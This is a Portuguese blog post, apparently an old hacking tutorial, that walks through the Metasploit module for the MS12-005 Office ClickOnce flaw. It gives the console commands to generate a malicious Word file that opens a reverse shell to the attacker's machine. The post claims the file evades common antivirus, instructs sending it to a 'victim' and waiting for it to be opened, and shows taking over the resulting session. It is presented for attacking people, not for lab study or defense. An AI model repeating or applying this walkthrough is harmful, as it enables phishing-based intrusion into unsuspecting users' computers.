E ai pessoal!
Segue ai um tuto muuuito antigo meu que achei aqui pelas minhas anotações.
E o primeiro deles é o exploit conhecido oficialmente como MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability
Descrição
Esse exploit serve para criar uma conexão reversa entre o PC da vítima e o PC do atacante. Explorando uma falha presente no Microsoft Word 2007 e posteriores. Basicamente é um arquivo do Word com um exploit em Python ou Ruby dentro.Prós
* Exploit roda em qualquer versão do Windows* Exploit roda em todas as versões anteriores do Office 2007
* Fácil utilização
* Antivirus não detecta (testado com Avast, AVG e Kaspersky) Prova aqui!
Contras
* Existe patch disponível* A vitima precisa receber e abrir o arquivo do word, caso o word seja fechado a conexão é finalizada em boa parte das vezes
* A vitima precisa ter instalado o active python/active ruby
* Word 2010 detecta como possível ameaça
Utilização
Vamos lá!Esse exploit pode ser encontrado no framework Metasploit. Para encontra-lo, digite no terminal do Backtrack ou qualquer outra distro para pentest o comando a seguir:
msfconsole
E para procurar o exploit no banco de dados:
search ms12
Pronto! Já temos o caminho do exploit, então vamos usá-lo:
use exploit/windows/fileformat/ms12_005
Agora vamos ver as informações que precisamos passar para o exploit com o seguinte comando:
show options
Podemos mudar o FILENAME (nome do arquivo final), SRVHOST (ip do atacante), SRVPORT (porta de conexão) e PAYLOAD_TYPE (especificar se quer ruby ou python).
Vamos usar o comando exploit para gerar o arquivo e iniciar o server:
Agora só precisamos mandar esse arquivo para a vitima e esperar que ela abra...
Na máquina windows com antivirus e Office instalado vamos tentar executar nosso exploit:
Como vimos o antivirus não tentou impedir nem a cópia para o PC e nem a abertura, o único alerta é uma mensagem do word dizendo que os macros foram desativados. Só depois dos macros serem ativados que o exploit roda...
Assim que os macros forem liberados, surge uma janela de confirmação pedindo se o python/ruby pode ser executado, caso não tenha instalado nada acontece e você perdeu um tempão :P
Assim que for dada a confirmação para o python uma janela do prompt aparece, quando for fechada a conexão é encerrada então seja rápido.
Agora que foi aberto o arquivo e em quanto tudo está aberto vamos de volta ao pc atacante ver o que está acontecendo por lá...
Pronto! Usei os comandos sessions -l para listar as sessões abertas, sessions -i 1 para acessar a primeira (e unica) sessão e o comando sysinfo para ver as infos da maquina invadida...
E era isso por em quanto!
Caso gostaram da idéia posto mais uns tutos/reviews de alguns tools e exploits...
Se quiserem indicar uma tool ou exploit também é bem vindo xD
Valeu
0 comentários:
Postar um comentário